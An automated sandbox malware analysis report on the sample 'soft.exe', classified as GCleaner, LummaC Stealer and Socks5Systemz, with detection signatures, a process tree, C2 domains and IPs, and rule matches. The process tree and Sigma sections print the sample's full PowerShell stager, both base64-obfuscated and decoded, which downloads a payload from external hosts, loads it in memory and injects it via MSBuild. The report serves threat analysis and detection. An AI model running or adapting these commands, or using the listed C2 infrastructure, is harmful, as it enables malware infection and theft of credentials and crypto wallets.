Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
soft.exe

Overview

General Information

Sample name:soft.exe
Analysis ID:1626993
MD5:c0d0b27ce5688d1912b5acfa788d08a2
SHA1:26e5e763ba5e7d58eb4663c3ae186f548ca16919
SHA256:1d0577799b61bc0f500c5438ebbdf0a22ad8f69411380037cb8c9a9eb029c57f
Tags:de-pumpedexeuser-abuse_ch
Infos:

Detection

GCleaner, LummaC Stealer, Socks5Systemz
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and load assembly
Sigma detected: Powershell download payload from hardcoded c2 list
Suricata IDS alerts for network traffic
Yara detected GCleaner
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Socks5Systemz
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PE file has a writeable .text section
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the clipboard data
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 4832 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 432 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • sppsvc.exe (PID: 5360 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 3796 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 5352 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • soft.exe (PID: 7084 cmdline: "C:\Users\user\Desktop\soft.exe" MD5: C0D0B27CE5688D1912B5ACFA788D08A2)
    • BitLockerToGo.exe (PID: 6828 cmdline: "C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe" MD5: A64BEAB5D4516BECA4C40B25DC0C1CD8)
      • N7LnRW81Rfq.exe (PID: 1888 cmdline: "C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" MD5: 1CB8DD3607684387ABD3B28876FE1808)
        • N7LnRW81Rfq.tmp (PID: 2044 cmdline: "C:\Users\user~1\AppData\Local\Temp\is-IL2KP.tmp\N7LnRW81Rfq.tmp" /SL5="$A0242,3545097,56832,C:\Users\user\AppData\Roaming\LivKm\N7LnRW81Rfq.exe" MD5: B7B82CFA8450995363936BF8AA65FEE6)
          • ssdtoolbox.exe (PID: 2236 cmdline: "C:\Users\user\AppData\Local\SSD ToolBox 5.1.9\ssdtoolbox.exe" -i MD5: CF8CD18A8C39163D0529175BBB6A7F45)
      • MnzBi21FK.exe (PID: 2500 cmdline: "C:\Users\user\AppData\Roaming\NP22AsNxTT\MnzBi21FK.exe" MD5: 3C570A5E7BA82EEA698EC56EC3427A2C)
        • cmd.exe (PID: 2908 cmdline: cmd.exe /c 67c2163c9db39.vbs MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • wscript.exe (PID: 2352 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\67c2163c9db39.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
            • powershell.exe (PID: 5924 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@aQBv@C8@MQ@v@HQ@ZQBz@HQ@LgBq@H@@Zw@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@I@@9@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@@k@Gw@aQBu@Gs@cw@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@Gk@Zg@g@Cg@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@LQBu@GU@I@@k@G4@dQBs@Gw@KQ@g@Hs@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C@@PQ@g@Fs@UwB5@HM@d@Bl@G0@LgBU@GU@e@B0@C4@RQBu@GM@bwBk@Gk@bgBn@F0@Og@6@FU@V@BG@Dg@LgBH@GU@d@BT@HQ@cgBp@G4@Zw@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@FM@V@BB@FI@V@@+@D4@Jw@7@C@@J@Bl@G4@Z@BG@Gw@YQBn@C@@PQ@g@Cc@P@@8@EI@QQBT@EU@Ng@0@F8@RQBO@EQ@Pg@+@Cc@Ow@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@KQ@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@C0@ZwBl@C@@M@@g@C0@YQBu@GQ@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@C0@ZwB0@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ck@I@B7@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@C@@Kw@9@C@@J@Bz@HQ@YQBy@HQ@RgBs@GE@Zw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@Bo@C@@PQ@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@LQ@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@UwB1@GI@cwB0@HI@aQBu@Gc@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@L@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@QwBv@G4@dgBl@HI@d@Bd@Do@OgBG@HI@bwBt@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@Ck@Ow@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@I@@g@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@GU@bgBk@EY@b@Bh@Gc@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@c@By@GU@cwBz@GU@Z@BC@Hk@d@Bl@EE@cgBy@GE@eQ@g@D0@I@BH@GU@d@@t@EM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@t@GI@eQB0@GU@QQBy@HI@YQB5@C@@J@Bl@G4@YwBU@GU@e@B0@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@HQ@eQBw@GU@I@@9@C@@J@Bs@G8@YQBk@GU@Z@BB@HM@cwBl@G0@YgBs@Hk@LgBH@GU@d@BU@Hk@c@Bl@Cg@JwB0@GU@cwB0@H@@bwB3@GU@cgBz@Gg@ZQBs@Gw@LgBI@G8@YQBh@GE@YQBh@GE@cwBk@G0@ZQ@n@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@ZQBu@GQ@SQBu@GQ@ZQB4@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBJ@G4@Z@Bl@Hg@TwBm@Cg@J@Bl@G4@Z@BG@Gw@YQBn@Ck@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@Jw@g@HQ@e@B0@C4@ZwBu@HI@YwBr@Gs@a@@v@HM@ZQBs@Gk@ZgBf@GM@aQBs@GI@dQBw@C8@Mg@x@DE@Lg@2@DI@Mg@u@D@@Ng@u@DI@Ng@v@C8@Og@n@Cw@I@@n@D@@Jw@s@C@@JwBT@HQ@YQBy@HQ@dQBw@E4@YQBt@GU@Jw@s@C@@JwBN@HM@YgB1@Gk@b@Bk@Cc@L@@g@Cc@M@@n@Ck@KQB9@H0@';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
              • conhost.exe (PID: 5688 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
              • powershell.exe (PID: 4704 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec MD5: 04029E121A0CFA5991749937DD22A1D9)
                • MSBuild.exe (PID: 4600 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • svchost.exe (PID: 4536 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 6420 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 5132 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 1424 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
GCleanerNo Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.gcleaner

Malware Configuration

Threatname: LummaC

{"C2 url": ["starrynsightsky.icu", "hardswarehub.today", "tracnquilforest.life", "hardrwarehaven.run", "seizedsentec.online", "codxefusion.top", "quietswtreams.life"], "Build id": "tqqheo--"}

Threatname: GCleaner

{"C2 addresses": ["45.91.200.135", "185.156.73.73"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000005.00000003.1654814559.000000000A112000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GCleanerYara detected GCleanerJoe Security
        00000005.00000002.1724312184.0000000009F2C000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GCleanerYara detected GCleanerJoe Security
          00000005.00000002.1723674731.0000000009E18000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GCleanerYara detected GCleanerJoe Security
            00000005.00000002.1722279329.0000000009C4D000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GCleanerYara detected GCleanerJoe Security
              00000005.00000002.1724497364.000000000A122000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GCleanerYara detected GCleanerJoe Security
                Click to see the 14 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                23.2.MSBuild.exe.400000.0.raw.unpackJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  5.2.soft.exe.9e18000.1.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                    5.2.soft.exe.9f2c000.3.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                      5.2.soft.exe.a122000.6.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                        5.2.soft.exe.9f00000.5.raw.unpackJoeSecurity_GCleanerYara detected GCleanerJoe Security
                          Click to see the 3 entries

                          Other

                          SourceRuleDescriptionAuthorStrings
                          amsi64_4704.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                            Sigma Signatures

                            Spreading

                            barindex
                            Sigma detected: Powershell download payload from hardcoded c2 list
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $endIndex = $imageText.IndexOf($endFlag); $commandBytes = [System.Convert]::FromBase64String($base64Command); $endIndex = $imageText.IndexOf($endFlag); $endIndex = $imageText.IndexOf($endFlag); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $endIndex = $imageText.IndexOf($endFlag); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.gnrckkh/selif_cilbup/211.622.06.26//:', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dgfgdfffffffffffg/gdfgdf/downloads/test2.jpg?137113', 'https://ofice365.github.io/1/test.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Lengthh = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Lengthh); $en

                            System Summary

                            barindex
                            Sigma detected: Base64 Encoded PowerShell Command Detected
                            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZwBm@Gc@Z@Bm@GY@ZgBm@GY@ZgBm@GY@ZgBm@GY@Zw@v@Gc@Z@Bm@Gc@Z@Bm@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@DI@LgBq@H@@Zw@/@DE@Mw@3@DE@MQ@z@Cc@L@@g@Cc@a@B0@HQ@c@Bz@Do@Lw@v@G8@ZgBp@GM@ZQ@z@DY@NQ@u@Gc@aQB0@Gg@dQBi@C4@